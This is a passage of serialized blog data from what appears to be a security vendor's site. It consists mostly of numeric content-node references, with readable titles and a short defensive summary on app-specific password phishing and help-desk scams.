5360],{"type":194},{},{"nodeType":173,"value":100879,"marks":105363,"data":105364},[],{},{"nodeType":186,"data":105366,"content":105367},{"uri":100884},[105368],{"nodeType":173,"value":100887,"marks":105369,"data":105371},[105370],{"type":194},{},{"nodeType":173,"value":100892,"marks":105373,"data":105374},[],{},{"nodeType":186,"data":105376,"content":105377},{"uri":100897},[105378],{"nodeType":173,"value":100900,"marks":105379,"data":105380},[],{},{"nodeType":173,"value":2936,"marks":105382,"data":105383},[],{},{"nodeType":186,"data":105385,"content":105386},{"uri":100908},[105387],{"nodeType":173,"value":100911,"marks":105388,"data":105389},[],{},{"nodeType":173,"value":933,"marks":105391,"data":105392},[],{},{"nodeType":186,"data":105394,"content":105395},{"uri":100908},[105396],{"nodeType":173,"value":100921,"marks":105397,"data":105398},[],{},{"nodeType":173,"value":2340,"marks":105400,"data":105401},[],{},{"nodeType":178,"data":105403,"content":105404},{},[105405],{"nodeType":173,"value":100931,"marks":105406,"data":105407},[],{},{"nodeType":231,"data":105409,"content":105410},{},[],{"nodeType":169,"data":105412,"content":105413},{},[105414],{"nodeType":173,"value":100941,"marks":105415,"data":105416},[],{},{"nodeType":178,"data":105418,"content":105419},{},[105420],{"nodeType":173,"value":100948,"marks":105421,"data":105422},[],{},{"nodeType":178,"data":105424,"content":105425},{},[105426],{"nodeType":173,"value":100955,"marks":105427,"data":105428},[],{},{"nodeType":178,"data":105430,"content":105431},{},[105432,105435,105439],{"nodeType":173,"value":100962,"marks":105433,"data":105434},[],{},{"nodeType":173,"value":100966,"marks":105436,"data":105438},[105437],{"type":1646},{},{"nodeType":173,"value":100971,"marks":105440,"data":105441},[],{},{"nodeType":178,"data":105443,"content":105444},{},[105445],{"nodeType":173,"value":100978,"marks":105446,"data":105447},[],{},{"nodeType":178,"data":105449,"content":105450},{},[105451],{"nodeType":173,"value":100985,"marks":105452,"data":105453},[],{},{"nodeType":231,"data":105455,"content":105456},{},[],{"nodeType":169,"data":105458,"content":105459},{},[105460],{"nodeType":173,"value":100995,"marks":105461,"data":105462},[],{},{"nodeType":178,"data":105464,"content":105465},{},[105466],{"nodeType":173,"value":101002,"marks":105467,"data":105468},[],{},{"nodeType":178,"data":105470,"content":105471},{},[105472],{"nodeType":173,"value":101009,"marks":105473,"data":105474},[],{},{"nodeType":250,"data":105476,"content":105477},{},[105478,105487,105496],{"nodeType":254,"data":105479,"content":105480},{},[105481],{"nodeType":178,"data":105482,"content":105483},{},[105484],{"nodeType":173,"value":101022,"marks":105485,"data":105486},[],{},{"nodeType":254,"data":105488,"content":105489},{},[105490],{"nodeType":178,"data":105491,"content":105492},{},[105493],{"nodeType":173,"value":101032,"marks":105494,"data":105495},[],{},{"nodeType":254,"data":105497,"content":105498},{},[105499],{"nodeType":178,"data":105500,"content":105501},{},[105502],{"nodeType":173,"value":101042,"marks":105503,"data":105504},[],{},{"nodeType":178,"data":105506,"content":105507},{},[105508],{"nodeType":173,"value":101049,"marks":105509,"data":105510},[],{},{"nodeType":250,"data":105512,"content":105513},{},[105514,105523],{"nodeType":254,"data":105515,"content":105516},{},[105517],{"nodeType":178,"data":105518,"content":105519},{},[105520],{"nodeType":173,"value":101062,"marks":105521,"data":105522},[],{},{"nodeType":254,"data":105524,"content":105525},{},[105526],{"nodeType":178,"data":105527,"content":105528},{},[105529],{"nodeType":173,"value":101072,"marks":105530,"data":105531},[],{},{"nodeType":178,"data":105533,"content":105534},{},[105535],{"nodeType":173,"value":101079,"marks":105536,"data":105537},[],{},{"nodeType":231,"data":105539,"content":105540},{},[],{"nodeType":169,"data":105542,"content":105543},{},[105544],{"nodeType":173,"value":101089,"marks":105545,"data":105546},[],{},{"nodeType":178,"data":105548,"content":105549},{},[105550],{"nodeType":173,"value":101096,"marks":105551,"data":105552},[],{},{"nodeType":178,"data":105554,"content":105555},{},[105556,105559,105566],{"nodeType":173,"value":37,"marks":105557,"data":105558},[],{},{"nodeType":186,"data":105560,"content":105561},{"uri":63182},[105562],{"nodeType":173,"value":101109,"marks":105563,"data":105565},[105564],{"type":194},{},{"nodeType":173,"value":101114,"marks":105567,"data":105568},[],{},{"nodeType":250,"data":105570,"content":105571},{},[105572,105581,105590,105609,105618,105627],{"nodeType":254,"data":105573,"content":105574},{},[105575],{"nodeType":178,"data":105576,"content":105577},{},[105578],{"nodeType":173,"value":101127,"marks":105579,"data":105580},[],{},{"nodeType":254,"data":105582,"content":105583},{},[105584],{"nodeType":178,"data":105585,"content":105586},{},[105587],{"nodeType":173,"value":101137,"marks":105588,"data":105589},[],{},{"nodeType":254,"data":105591,"content":105592},{},[105593],{"nodeType":178,"data":105594,"content":105595},{},[105596,105599,105606],{"nodeType":173,"value":59119,"marks":105597,"data":105598},[],{},{"nodeType":186,"data":105600,"content":105601},{"uri":775},[105602],{"nodeType":173,"value":778,"marks":105603,"data":105605},[105604],{"type":194},{},{"nodeType":173,"value":101157,"marks":105607,"data":105608},[],{},{"nodeType":254,"data":105610,"content":105611},{},[105612],{"nodeType":178,"data":105613,"content":105614},{},[105615],{"nodeType":173,"value":101167,"marks":105616,"data":105617},[],{},{"nodeType":254,"data":105619,"content":105620},{},[105621],{"nodeType":178,"data":105622,"content":105623},{},[105624],{"nodeType":173,"value":101177,"marks":105625,"data":105626},[],{},{"nodeType":254,"data":105628,"content":105629},{},[105630],{"nodeType":178,"data":105631,"content":105632},{},[105633,105636,105643],{"nodeType":173,"value":101187,"marks":105634,"data":105635},[],{},{"nodeType":186,"data":105637,"content":105638},{"uri":49844},[105639],{"nodeType":173,"value":101194,"marks":105640,"data":105642},[105641],{"type":194},{},{"nodeType":173,"value":101199,"marks":105644,"data":105645},[],{},{"nodeType":178,"data":105647,"content":105648},{},[105649],{"nodeType":173,"value":101206,"marks":105650,"data":105651},[],{},{"nodeType":312,"data":105653,"content":105656},{"target":105654},{"sys":105655},{"id":88007,"type":317,"linkType":318},[],{"nodeType":231,"data":105658,"content":105659},{},[],{"nodeType":169,"data":105661,"content":105662},{},[105663],{"nodeType":173,"value":101221,"marks":105664,"data":105665},[],{},{"nodeType":178,"data":105667,"content":105668},{},[105669],{"nodeType":173,"value":101228,"marks":105670,"data":105671},[],{},{"nodeType":178,"data":105673,"content":105674},{},[105675],{"nodeType":173,"value":101235,"marks":105676,"data":105677},[],{},{"nodeType":312,"data":105679,"content":105682},{"target":105680},{"sys":105681},{"id":101242,"type":317,"linkType":318},[],{"nodeType":178,"data":105684,"content":105685},{},[105686,105689,105697],{"nodeType":173,"value":101248,"marks":105687,"data":105688},[],{},{"nodeType":186,"data":105690,"content":105691},{"uri":9152},[105692],{"nodeType":173,"value":101255,"marks":105693,"data":105696},[105694,105695],{"type":194},{"type":370},{},{"nodeType":173,"value":101261,"marks":105698,"data":105699},[],{},{"nodeType":312,"data":105701,"content":105704},{"target":105702},{"sys":105703},{"id":9179,"type":317,"linkType":318},[],{"nodeType":178,"data":105706,"content":105707},{},[105708],{"nodeType":173,"value":101273,"marks":105709,"data":105710},[],{},{"nodeType":231,"data":105712,"content":105713},{},[],{"nodeType":169,"data":105715,"content":105716},{},[105717],{"nodeType":173,"value":88147,"marks":105718,"data":105719},[],{},{"nodeType":178,"data":105721,"content":105722},{},[105723,105726,105733],{"nodeType":173,"value":101289,"marks":105724,"data":105725},[],{},{"nodeType":186,"data":105727,"content":105728},{"uri":101294},[105729],{"nodeType":173,"value":101297,"marks":105730,"data":105732},[105731],{"type":194},{},{"nodeType":173,"value":101302,"marks":105734,"data":105735},[],{},{"nodeType":178,"data":105737,"content":105738},{},[105739,105742,105749],{"nodeType":173,"value":101309,"marks":105740,"data":105741},[],{},{"nodeType":186,"data":105743,"content":105744},{"uri":473},[105745],{"nodeType":173,"value":1472,"marks":105746,"data":105748},[105747],{"type":194},{},{"nodeType":173,"value":1477,"marks":105750,"data":105751},[],{},{"nodeType":312,"data":105753,"content":105756},{"target":105754},{"sys":105755},{"id":101326,"type":317,"linkType":318},[],{"nodeType":178,"data":105758,"content":105759},{},[105760],{"nodeType":173,"value":37,"marks":105761,"data":105762},[],{},{"entries":105764},{"hyperlink":105765,"inline":105766,"block":105767},[],[],[105768,105798,105800,105803,105806],{"sys":105769,"__typename":5311,"content":105770,"name":102961,"title":118},{"id":100724},{"json":105771},{"nodeType":165,"data":105772,"content":105773},{},[105774],{"nodeType":178,"data":105775,"content":105776},{},[105777,105780,105786,105789,105795],{"nodeType":173,"value":102936,"marks":105778,"data":105779},[],{},{"nodeType":186,"data":105781,"content":105782},{"uri":39735},[105783],{"nodeType":173,"value":102943,"marks":105784,"data":105785},[],{},{"nodeType":173,"value":102947,"marks":105787,"data":105788},[],{},{"nodeType":186,"data":105790,"content":105791},{"uri":39735},[105792],{"nodeType":173,"value":102954,"marks":105793,"data":105794},[],{},{"nodeType":173,"value":102958,"marks":105796,"data":105797},[],{},{"sys":105799,"__typename":15269,"type":15270,"ctaText":102964,"buttonLabel":102965,"buttonColour":15273,"buttonUrl":102966},{"id":88007},{"sys":105801,"__typename":5345,"title":102999,"caption":102999,"layoutMode":118,"file":105802},{"id":101242},{"url":103001,"width":5358,"height":102972},{"sys":105804,"__typename":5345,"title":32278,"caption":32279,"layoutMode":118,"file":105805},{"id":9179},{"url":32281,"width":32282,"height":32283},{"sys":105807,"__typename":15269,"type":15270,"ctaText":103013,"buttonLabel":103014,"buttonColour":15273,"buttonUrl":101294},{"id":101326},"content:blog:scattered-spider-defending-against-help-desk-scams.json","blog/scattered-spider-defending-against-help-desk-scams.json","blog/scattered-spider-defending-against-help-desk-scams",{"_path":105812,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":105813,"ogImage":118,"summary":105815,"title":97126,"subtitle":118,"metaTitle":105826,"synopsis":97127,"hashTags":118,"publishedDate":93522,"slug":97128,"tagsCollection":105827,"relatedBlogPostsCollection":105833,"authorsCollection":107142,"content":107146,"_id":107765,"_type":5439,"_source":5440,"_file":107766,"_stem":107767,"_extension":5439},"/blog/app-specific-password-phishing",{"id":96467,"publishedAt":105814},"2025-06-26T12:34:51.659Z",{"json":105816},{"data":105817,"content":105818,"nodeType":165},{},[105819],{"data":105820,"content":105821,"nodeType":178},{},[105822],{"data":105823,"marks":105824,"value":105825,"nodeType":173},{},[],"Attackers in the wild have been observed using advanced social engineering tactics to convince victims to create and share App-Specific Passwords, representing the latest in phishing tactics capable of sidestepping otherwise phishing-resistant login methods, and bypassing MFA checks. ","App-Specific Password phishing and how to prevent it",{"items":105828},[105829,105831],{"sys":105830,"name":505},{"id":504},{"sys":105832,"name":509},{"id":508},{"items":105834},[105835,106121,106693],{"__typename":1528,"sys":105836,"content":105837,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":106111,"authorsCollection":106117},{"id":162},{"json":105838},{"nodeType":165,"data":105839,"content":105840},{},[105841,105847,105863,105876,105882,105888,105891,105897,105903,105951,105957,105962,105965,105971,105977,105983,105989,105995,106009,106014,106020,106026,106040,106045,106051,106057,106063,106069,106075,106078,106084,106100,106105],{"nodeType":169,"data":105842,"content":105843},{},[105844],{"nodeType":173,"value":174,"marks":105845,"data":105846},[],{},{"nodeType":178,"data":105848,"content":105849},{},[105850,105853,105860],{"nodeType":173,"value":182,"marks":105851,"data":105852},[],{},{"nodeType":186,"data":105854,"content":105855},{"uri":188},[105856],{"nodeType":173,"value":191,"marks":105857,"data":105859},[105858],{"type":194},{},{"nodeType":173,"value":197,"marks":105861,"data":105862},[],{},{"nodeType":178,"data":105864,"content":105865},{},[105866,105869,105873],{"nodeType":173,"value":204,"marks":105867,"data":105868},[],{},{"nodeType":173,"value":208,"marks":105870,"data":105872},[105871],{"type":194},{},{"nodeType":173,"value":213,"marks":105874,"data":105875},[],{},{"nodeType":178,"data":105877,"content":105878},{},[105879],{"nodeType":173,"value":220,"marks":105880,"data":105881},[],{},{"nodeType":178,"data":105883,"content":105884},{},[105885],{"nodeType":173,"value":227,"marks":105886,"data":105887},[],{},{"nodeType":231,"data":105889,"content":105890},{},[],{"nodeType":235,"data":105892,"content":105893},{},[105894],{"nodeType":173,"value":239,"marks":105895,"data":105896},[],{},{"nodeType":178,"data":105898,"content":105899},{},[105900],{"nodeType":173,"value":246,"marks":105901,"data":105902},[],{},{"nodeType":250,"data":105904,"content":105905},{},[105906,105915,105924,105933,105942],{"nodeType":254,"data":105907,"content":105908},{},[105909],{"nodeType":178,"data":105910,"content":105911},{},[105912],{"nodeType":173,"value":261,"marks":105913,"data":105914},[],{},{"nodeType":254,"data":105916,"content":105917},{},[105918],{"nodeType":178,"data":105919,"content":105920},{},[105921],{"nodeType":173,"value":271,"marks":105922,"data":105923},[],{},{"nodeType":254,"data":105925,"content":105926},{},[105927],{"nodeType":178,"data":105928,"content":105929},{},[105930],{"nodeType":173,"value":281,"marks":105931,"data":105932},[],{},{"nodeType":254,"data":105934,"content":105935},{},[105936],{"nodeType":178,"data":105937,"content":105938},{},[105939],{"nodeType":173,"value":291,"marks":105940,"data":105941},[],{},{"nodeType":254,"data":105943,"content":105944},{},[105945],{"nodeType":178,"data":105946,"content":105947},{},[105948],{"nodeType":173,"value":301,"marks":105949,"data":105950},[],{},{"nodeType":178,"data":105952,"content":105953},{},[105954],{"nodeType":173,"value":308,"marks":105955,"data":105956},[],{},{"nodeType":312,"data":105958,"content":105961},{"target":105959},{"sys":105960},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":105963,"content":105964},{},[],{"nodeType":235,"data":105966,"content":105967},{},[105968],{"nodeType":173,"value":327,"marks":105969,"data":105970},[],{},{"nodeType":178,"data":105972,"content":105973},{},[105974],{"nodeType":173,"value":334,"marks":105975,"data":105976},[],{},{"nodeType":178,"data":105978,"content":105979},{},[105980],{"nodeType":173,"value":341,"marks":105981,"data":105982},[],{},{"nodeType":178,"data":105984,"content":105985},{},[105986],{"nodeType":173,"value":348,"marks":105987,"data":105988},[],{},{"nodeType":178,"data":105990,"content":105991},{},[105992],{"nodeType":173,"value":355,"marks":105993,"data":105994},[],{},{"nodeType":235,"data":105996,"content":105997},{},[105998,106001,106006],{"nodeType":173,"value":362,"marks":105999,"data":106000},[],{},{"nodeType":173,"value":366,"marks":106002,"data":106005},[106003,106004],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":106007,"data":106008},[],{},{"nodeType":312,"data":106010,"content":106013},{"target":106011},{"sys":106012},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":106015,"content":106016},{},[106017],{"nodeType":173,"value":386,"marks":106018,"data":106019},[],{},{"nodeType":178,"data":106021,"content":106022},{},[106023],{"nodeType":173,"value":393,"marks":106024,"data":106025},[],{},{"nodeType":235,"data":106027,"content":106028},{},[106029,106032,106037],{"nodeType":173,"value":400,"marks":106030,"data":106031},[],{},{"nodeType":173,"value":404,"marks":106033,"data":106036},[106034,106035],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":106038,"data":106039},[],{},{"nodeType":312,"data":106041,"content":106044},{"target":106042},{"sys":106043},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":106046,"content":106047},{},[106048],{"nodeType":173,"value":423,"marks":106049,"data":106050},[],{},{"nodeType":178,"data":106052,"content":106053},{},[106054],{"nodeType":173,"value":430,"marks":106055,"data":106056},[],{},{"nodeType":178,"data":106058,"content":106059},{},[106060],{"nodeType":173,"value":437,"marks":106061,"data":106062},[],{},{"nodeType":178,"data":106064,"content":106065},{},[106066],{"nodeType":173,"value":444,"marks":106067,"data":106068},[],{},{"nodeType":178,"data":106070,"content":106071},{},[106072],{"nodeType":173,"value":451,"marks":106073,"data":106074},[],{},{"nodeType":231,"data":106076,"content":106077},{},[],{"nodeType":169,"data":106079,"content":106080},{},[106081],{"nodeType":173,"value":461,"marks":106082,"data":106083},[],{},{"nodeType":178,"data":106085,"content":106086},{},[106087,106090,106097],{"nodeType":173,"value":468,"marks":106088,"data":106089},[],{},{"nodeType":186,"data":106091,"content":106092},{"uri":473},[106093],{"nodeType":173,"value":476,"marks":106094,"data":106096},[106095],{"type":194},{},{"nodeType":173,"value":481,"marks":106098,"data":106099},[],{},{"nodeType":312,"data":106101,"content":106104},{"target":106102},{"sys":106103},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":106106,"content":106107},{},[106108],{"nodeType":173,"value":37,"marks":106109,"data":106110},[],{},{"items":106112},[106113,106115],{"sys":106114,"name":505},{"id":504},{"sys":106116,"name":509},{"id":508},{"items":106118},[106119],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":106120},{"url":516},{"__typename":1528,"sys":106122,"content":106123,"title":98341,"synopsis":98342,"hashTags":118,"publishedDate":98343,"slug":98344,"tagsCollection":106683,"authorsCollection":106689},{"id":97694},{"json":106124},{"nodeType":165,"data":106125,"content":106126},{},[106127,106133,106139,106145,106148,106155,106161,106177,106207,106212,106228,106233,106253,106256,106263,106269,106282,106295,106300,106306,106312,106317,106330,106333,106340,106346,106352,106358,106364,106367,106374,106380,106386,106402,106408,106415,106454,106460,106465,106471,106476,106482,106485,106492,106505,106511,106545,106555,106558,106565,106571,106577,106607,106613,106630,106635,106640,106643,106650,106656,106672,106677],{"nodeType":178,"data":106128,"content":106129},{},[106130],{"nodeType":173,"value":97703,"marks":106131,"data":106132},[],{},{"nodeType":178,"data":106134,"content":106135},{},[106136],{"nodeType":173,"value":97710,"marks":106137,"data":106138},[],{},{"nodeType":178,"data":106140,"content":106141},{},[106142],{"nodeType":173,"value":97717,"marks":106143,"data":106144},[],{},{"nodeType":231,"data":106146,"content":106147},{},[],{"nodeType":169,"data":106149,"content":106150},{},[106151],{"nodeType":173,"value":97727,"marks":106152,"data":106154},[106153],{"type":370},{},{"nodeType":178,"data":106156,"content":106157},{},[106158],{"nodeType":173,"value":97735,"marks":106159,"data":106160},[],{},{"nodeType":178,"data":106162,"content":106163},{},[106164,106167,106174],{"nodeType":173,"value":97742,"marks":106165,"data":106166},[],{},{"nodeType":186,"data":106168,"content":106169},{"uri":97747},[106170],{"nodeType":173,"value":97750,"marks":106171,"data":106173},[106172],{"type":194},{},{"nodeType":173,"value":97755,"marks":106175,"data":106176},[],{},{"nodeType":250,"data":106178,"content":106179},{},[106180,106189,106198],{"nodeType":254,"data":106181,"content":106182},{},[106183],{"nodeType":178,"data":106184,"content":106185},{},[106186],{"nodeType":173,"value":97768,"marks":106187,"data":106188},[],{},{"nodeType":254,"data":106190,"content":106191},{},[106192],{"nodeType":178,"data":106193,"content":106194},{},[106195],{"nodeType":173,"value":97778,"marks":106196,"data":106197},[],{},{"nodeType":254,"data":106199,"content":106200},{},[106201],{"nodeType":178,"data":106202,"content":106203},{},[106204],{"nodeType":173,"value":97788,"marks":106205,"data":106206},[],{},{"nodeType":312,"data":106208,"content":106211},{"target":106209},{"sys":106210},{"id":97795,"type":317,"linkType":318},[],{"nodeType":178,"data":106213,"content":106214},{},[106215,106218,106225],{"nodeType":173,"value":97801,"marks":106216,"data":106217},[],{},{"nodeType":186,"data":106219,"content":106220},{"uri":97806},[106221],{"nodeType":173,"value":97809,"marks":106222,"data":106224},[106223],{"type":194},{},{"nodeType":173,"value":97814,"marks":106226,"data":106227},[],{},{"nodeType":312,"data":106229,"content":106232},{"target":106230},{"sys":106231},{"id":97821,"type":317,"linkType":318},[],{"nodeType":178,"data":106234,"content":106235},{},[106236,106239,106243,106246,106250],{"nodeType":173,"value":97827,"marks":106237,"data":106238},[],{},{"nodeType":173,"value":97831,"marks":106240,"data":106242},[106241],{"type":370},{},{"nodeType":173,"value":97836,"marks":106244,"data":106245},[],{},{"nodeType":173,"value":5440,"marks":106247,"data":106249},[106248],{"type":370},{},{"nodeType":173,"value":97844,"marks":106251,"data":106252},[],{},{"nodeType":231,"data":106254,"content":106255},{},[],{"nodeType":169,"data":106257,"content":106258},{},[106259],{"nodeType":173,"value":97854,"marks":106260,"data":106262},[106261],{"type":370},{},{"nodeType":178,"data":106264,"content":106265},{},[106266],{"nodeType":173,"value":97862,"marks":106267,"data":106268},[],{},{"nodeType":178,"data":106270,"content":106271},{},[106272,106275,106279],{"nodeType":173,"value":97869,"marks":106273,"data":106274},[],{},{"nodeType":173,"value":4821,"marks":106276,"data":106278},[106277],{"type":1646},{},{"nodeType":173,"value":97877,"marks":106280,"data":106281},[],{},{"nodeType":178,"data":106283,"content":106284},{},[106285,106288,106292],{"nodeType":173,"value":97884,"marks":106286,"data":106287},[],{},{"nodeType":173,"value":97888,"marks":106289,"data":106291},[106290],{"type":370},{},{"nodeType":173,"value":197,"marks":106293,"data":106294},[],{},{"nodeType":312,"data":106296,"content":106299},{"target":106297},{"sys":106298},{"id":97899,"type":317,"linkType":318},[],{"nodeType":178,"data":106301,"content":106302},{},[106303],{"nodeType":173,"value":97905,"marks":106304,"data":106305},[],{},{"nodeType":178,"data":106307,"content":106308},{},[106309],{"nodeType":173,"value":97912,"marks":106310,"data":106311},[],{},{"nodeType":312,"data":106313,"content":106316},{"target":106314},{"sys":106315},{"id":97919,"type":317,"linkType":318},[],{"nodeType":178,"data":106318,"content":106319},{},[106320,106323,106327],{"nodeType":173,"value":97925,"marks":106321,"data":106322},[],{},{"nodeType":173,"value":97929,"marks":106324,"data":106326},[106325],{"type":370},{},{"nodeType":173,"value":97934,"marks":106328,"data":106329},[],{},{"nodeType":231,"data":106331,"content":106332},{},[],{"nodeType":169,"data":106334,"content":106335},{},[106336],{"nodeType":173,"value":97944,"marks":106337,"data":106339},[106338],{"type":370},{},{"nodeType":178,"data":106341,"content":106342},{},[106343],{"nodeType":173,"value":97952,"marks":106344,"data":106345},[],{},{"nodeType":178,"data":106347,"content":106348},{},[106349],{"nodeType":173,"value":97959,"marks":106350,"data":106351},[],{},{"nodeType":178,"data":106353,"content":106354},{},[106355],{"nodeType":173,"value":97966,"marks":106356,"data":106357},[],{},{"nodeType":178,"data":106359,"content":106360},{},[106361],{"nodeType":173,"value":97973,"marks":106362,"data":106363},[],{},{"nodeType":231,"data":106365,"content":106366},{},[],{"nodeType":169,"data":106368,"content":106369},{},[106370],{"nodeType":173,"value":97983,"marks":106371,"data":106373},[106372],{"type":370},{},{"nodeType":178,"data":106375,"content":106376},{},[106377],{"nodeType":173,"value":97991,"marks":106378,"data":106379},[],{},{"nodeType":178,"data":106381,"content":106382},{},[106383],{"nodeType":173,"value":97998,"marks":106384,"data":106385},[],{},{"nodeType":178,"data":106387,"content":106388},{},[106389,106392,106399],{"nodeType":173,"value":98005,"marks":106390,"data":106391},[],{},{"nodeType":186,"data":106393,"content":106394},{"uri":98010},[106395],{"nodeType":173,"value":98013,"marks":106396,"data":106398},[106397],{"type":194},{},{"nodeType":173,"value":98018,"marks":106400,"data":106401},[],{},{"nodeType":178,"data":106403,"content":106404},{},[106405],{"nodeType":173,"value":98025,"marks":106406,"data":106407},[],{},{"nodeType":178,"data":106409,"content":106410},{},[106411],{"nodeType":173,"value":98032,"marks":106412,"data":106414},[106413],{"type":370},{},{"nodeType":250,"data":106416,"content":106417},{},[106418,106427,106436,106445],{"nodeType":254,"data":106419,"content":106420},{},[106421],{"nodeType":178,"data":106422,"content":106423},{},[106424],{"nodeType":173,"value":81804,"marks":106425,"data":106426},[],{},{"nodeType":254,"data":106428,"content":106429},{},[106430],{"nodeType":178,"data":106431,"content":106432},{},[106433],{"nodeType":173,"value":98055,"marks":106434,"data":106435},[],{},{"nodeType":254,"data":106437,"content":106438},{},[106439],{"nodeType":178,"data":106440,"content":106441},{},[106442],{"nodeType":173,"value":98065,"marks":106443,"data":106444},[],{},{"nodeType":254,"data":106446,"content":106447},{},[106448],{"nodeType":178,"data":106449,"content":106450},{},[106451],{"nodeType":173,"value":98075,"marks":106452,"data":106453},[],{},{"nodeType":178,"data":106455,"content":106456},{},[106457],{"nodeType":173,"value":98082,"marks":106458,"data":106459},[],{},{"nodeType":312,"data":106461,"content":106464},{"target":106462},{"sys":106463},{"id":98089,"type":317,"linkType":318},[],{"nodeType":178,"data":106466,"content":106467},{},[106468],{"nodeType":173,"value":98095,"marks":106469,"data":106470},[],{},{"nodeType":312,"data":106472,"content":106475},{"target":106473},{"sys":106474},{"id":98102,"type":317,"linkType":318},[],{"nodeType":178,"data":106477,"content":106478},{},[106479],{"nodeType":173,"value":98108,"marks":106480,"data":106481},[],{},{"nodeType":231,"data":106483,"content":106484},{},[],{"nodeType":169,"data":106486,"content":106487},{},[106488],{"nodeType":173,"value":98118,"marks":106489,"data":106491},[106490],{"type":370},{},{"nodeType":178,"data":106493,"content":106494},{},[106495,106498,106502],{"nodeType":173,"value":98126,"marks":106496,"data":106497},[],{},{"nodeType":173,"value":98130,"marks":106499,"data":106501},[106500],{"type":370},{},{"nodeType":173,"value":197,"marks":106503,"data":106504},[],{},{"nodeType":178,"data":106506,"content":106507},{},[106508],{"nodeType":173,"value":98141,"marks":106509,"data":106510},[],{},{"nodeType":178,"data":106512,"content":106513},{},[106514,106517,106521,106524,106528,106531,106535,106538,106542],{"nodeType":173,"value":98148,"marks":106515,"data":106516},[],{},{"nodeType":173,"value":98152,"marks":106518,"data":106520},[106519],{"type":370},{},{"nodeType":173,"value":98157,"marks":106522,"data":106523},[],{},{"nodeType":173,"value":98161,"marks":106525,"data":106527},[106526],{"type":370},{},{"nodeType":173,"value":98166,"marks":106529,"data":106530},[],{},{"nodeType":173,"value":98161,"marks":106532,"data":106534},[106533],{"type":370},{},{"nodeType":173,"value":98174,"marks":106536,"data":106537},[],{},{"nodeType":173,"value":98178,"marks":106539,"data":106541},[106540],{"type":370},{},{"nodeType":173,"value":98183,"marks":106543,"data":106544},[],{},{"nodeType":178,"data":106546,"content":106547},{},[106548,106551],{"nodeType":173,"value":98190,"marks":106549,"data":106550},[],{},{"nodeType":173,"value":98194,"marks":106552,"data":106554},[106553],{"type":370},{},{"nodeType":231,"data":106556,"content":106557},{},[],{"nodeType":169,"data":106559,"content":106560},{},[106561],{"nodeType":173,"value":98205,"marks":106562,"data":106564},[106563],{"type":370},{},{"nodeType":178,"data":106566,"content":106567},{},[106568],{"nodeType":173,"value":98213,"marks":106569,"data":106570},[],{},{"nodeType":178,"data":106572,"content":106573},{},[106574],{"nodeType":173,"value":98220,"marks":106575,"data":106576},[],{},{"nodeType":250,"data":106578,"content":106579},{},[106580,106589,106598],{"nodeType":254,"data":106581,"content":106582},{},[106583],{"nodeType":178,"data":106584,"content":106585},{},[106586],{"nodeType":173,"value":98233,"marks":106587,"data":106588},[],{},{"nodeType":254,"data":106590,"content":106591},{},[106592],{"nodeType":178,"data":106593,"content":106594},{},[106595],{"nodeType":173,"value":98243,"marks":106596,"data":106597},[],{},{"nodeType":254,"data":106599,"content":106600},{},[106601],{"nodeType":178,"data":106602,"content":106603},{},[106604],{"nodeType":173,"value":98253,"marks":106605,"data":106606},[],{},{"nodeType":178,"data":106608,"content":106609},{},[106610],{"nodeType":173,"value":98260,"marks":106611,"data":106612},[],{},{"nodeType":178,"data":106614,"content":106615},{},[106616,106620,106627],{"nodeType":173,"value":98267,"marks":106617,"data":106619},[106618],{"type":370},{},{"nodeType":186,"data":106621,"content":106622},{"uri":98273},[106623],{"nodeType":173,"value":98276,"marks":106624,"data":106626},[106625],{"type":194},{},{"nodeType":173,"value":37,"marks":106628,"data":106629},[],{},{"nodeType":312,"data":106631,"content":106634},{"target":106632},{"sys":106633},{"id":98287,"type":317,"linkType":318},[],{"nodeType":312,"data":106636,"content":106639},{"target":106637},{"sys":106638},{"id":98293,"type":317,"linkType":318},[],{"nodeType":231,"data":106641,"content":106642},{},[],{"nodeType":169,"data":106644,"content":106645},{},[106646],{"nodeType":173,"value":18605,"marks":106647,"data":106649},[106648],{"type":370},{},{"nodeType":178,"data":106651,"content":106652},{},[106653],{"nodeType":173,"value":98309,"marks":106654,"data":106655},[],{},{"nodeType":178,"data":106657,"content":106658},{},[106659,106662,106669],{"nodeType":173,"value":61741,"marks":106660,"data":106661},[],{},{"nodeType":186,"data":106663,"content":106664},{"uri":98320},[106665],{"nodeType":173,"value":1472,"marks":106666,"data":106668},[106667],{"type":194},{},{"nodeType":173,"value":1477,"marks":106670,"data":106671},[],{},{"nodeType":312,"data":106673,"content":106676},{"target":106674},{"sys":106675},{"id":98333,"type":317,"linkType":318},[],{"nodeType":178,"data":106678,"content":106679},{},[106680],{"nodeType":173,"value":37,"marks":106681,"data":106682},[],{},{"items":106684},[106685,106687],{"sys":106686,"name":509},{"id":508},{"sys":106688,"name":505},{"id":504},{"items":106690},[106691],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":106692},{"url":1496},{"__typename":1528,"sys":106694,"content":106696,"title":107128,"synopsis":107129,"hashTags":118,"publishedDate":107130,"slug":107131,"tagsCollection":107132,"authorsCollection":107138},{"id":106695},"3uLWz59In1waXGcLB9cnPq",{"json":106697},{"data":106698,"content":106699,"nodeType":165},{},[106700,106729,106749,106756,106763,106766,106774,106781,106787,106793,106799,106806,106826,106832,106835,106843,106850,106857,106864,106870,106877,106884,106890,106897,106915,106920,106927,106930,106938,106945,106951,106958,107003,107009,107016,107019,107027,107034,107041,107047,107052,107058,107061,107069,107076,107082,107089,107096,107099,107106,107112],{"data":106701,"content":106702,"nodeType":178},{},[106703,106706,106713,106717,106725],{"data":106704,"marks":106705,"value":37,"nodeType":173},{},[],{"data":106707,"content":106708,"nodeType":186},{"uri":19838},[106709],{"data":106710,"marks":106711,"value":39940,"nodeType":173},{},[106712],{"type":194},{"data":106714,"marks":106715,"value":106716,"nodeType":173},{},[]," was one of the first techniques we added to the 